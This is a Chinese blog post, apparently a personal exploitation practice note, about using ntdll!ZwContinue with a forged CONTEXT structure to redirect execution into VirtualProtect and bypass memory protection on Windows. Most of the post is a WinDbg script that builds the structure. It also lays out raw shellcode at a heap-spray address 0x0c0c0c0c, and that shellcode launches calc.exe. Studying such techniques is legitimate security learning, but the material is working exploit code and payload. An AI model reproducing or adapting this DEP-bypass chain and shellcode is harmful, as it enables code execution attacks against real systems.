注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

ZwContinue内容的构造  

2014-10-30 11:29:36|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

这篇跟之前的那篇《昨天验证了下用ZwContinue改写eip和esp》基本上是重复的。

我只是想看看具体的构造内容是什么样子。你可以断在ZwContinue看看相关内存。

我把很多无关数据用11,22,33替换了。如下面的很多11,22,33都是任意的。

 

由漏洞转入的调用必须传人两个参数,一个为指定的地址,另一个为零。

指定的地址指向的内容,前面部分是VirtualProtect的参数和shellcode,后面部分放CONTEXT内容。

如下脚本所示ctn3.x

*** run calc shellcode by ntdll!ZwContinue ***
g @$exentry
**********************
.dvalloc /b 0c0b0000 20000
**********************
r @eip=ntdll!ZwContinue
r @esp=@esp-400
r @$t1=0c0c0c0c+100
ed @esp 88888888 @$t1 0
ed @$t1
0001003f
00000000
00000000
00000000
00000000
00000000
00000000
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
11111111
00000000
0000003b
00000023
00000023
22222222
22222222
22222222
22222222
22222222
22222222
22222222
7c801ad4
0000001b
00010246
0c0c0c0c
00000023
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333
33333333

*******************************************
.echo =change eip=
ed @$t1+b8 kernel32!VirtualProtect
.echo =change esp=
ed @$t1+c4 0c0c0c0c
*******************************************
ed 0c0c0c0c
0c0c0c28
0c0c0000
00010000
00000040
0c0c0c24
90909090
90909090
0089E8FC
89600000
64D231E5
8B30528B
528B0C52
28728B14
264AB70F
C031FF31
7C613CAC
C1202C02
C7010DCF
5752F0E2
8B10528B
D0013C42
8578408B
014A74C0
488B50D0
20588B18
3CE3D301
8B348B49
FF31D601
C1ACC031
C7010DCF
F475E038
3BF87D03
E275247D
24588B58
8B66D301
588B4B0C
8BD3011C
D0018B04
24244489
59615B5B
E0FF515A
8B5A5F58
5D86EB12
858D016A
000000B9
8B316850
D5FF876F
2A1DE0BB
95A6680A
D5FF9DBD
0A7C063C
75E0FB80
1347BB05
006A6F72
63D5FF53
2E636C61
00657865

g
q


 

  评论这张
 
阅读(569)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017